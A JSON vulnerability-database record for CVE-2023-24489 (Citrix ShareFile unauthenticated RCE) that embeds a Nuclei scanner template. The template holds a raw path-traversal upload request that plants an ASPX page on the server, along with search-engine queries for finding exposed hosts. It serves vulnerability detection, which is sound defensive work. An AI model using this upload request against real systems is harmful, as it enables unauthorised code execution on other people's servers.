{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-24489/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-24489/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-24489/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-24489/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-24489/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-24489"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-24489"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-24489.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2023-24489\n\ninfo:\n  name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution\n  author: DhiyaneshDK,dwisiswant0\n  severity: critical\n  description: |\n    A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n  remediation: |\n    Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-24489\n    - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/\n    - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489\n    - https://github.com/20142995/sectool\n    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-24489\n    cwe-id: CWE-284,NVD-CWE-Other\n    epss-score: 0.97343\n    epss-percentile: 0.99896\n    cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 256\n    vendor: citrix\n    product: sharefile_storage_zones_controller\n    shodan-query:\n      - title:\"ShareFile Storage Server\"\n      - http.title:\"sharefile storage server\"\n    fofa-query: title=\"sharefile storage server\"\n    google-query: intitle:\"sharefile storage server\"\n  tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix,vkev,vuln\nvariables:\n  fileName: '{{rand_base(8)}}'\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    matchers:\n      - type: word\n        words:\n          - \"ShareFile Storage Server\"\n          - \"ShareFile\"\n          - \"documentum\"\n        condition: or\n        internal: true\n\n  - raw:\n      - |\n        POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\n        Host: {{Hostname}}\n\n        <%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n        <script Language=\"c#\" runat=\"server\">\n        void Page_Load(object sender, EventArgs e)\n        {\n            Response.Write(\"{{randstr}}\");\n        }\n        </script>\n\n    payloads:\n      padding: helpers/payloads/citrix_paddings.txt\n    stop-at-first-match: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'body == \"ERROR: The method or operation is not implemented.\"'\n          - 'status_code == 200'\n        condition: and\n\n    extractors:\n      - type: dsl\n        dsl:\n          - 'BaseURL+ \"/cifs/\" + fileName + \".aspx\"'\n# digest: 4b0a0048304602210083914880cadde65491acfde61adde23e18f335e09b39814bd59e5e1d6ee249400221008612216f8bddd6e85c9ee5c2fdca84cfd851c9a1e8ffb6a2a95827bb19a1ee04:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-24489"
}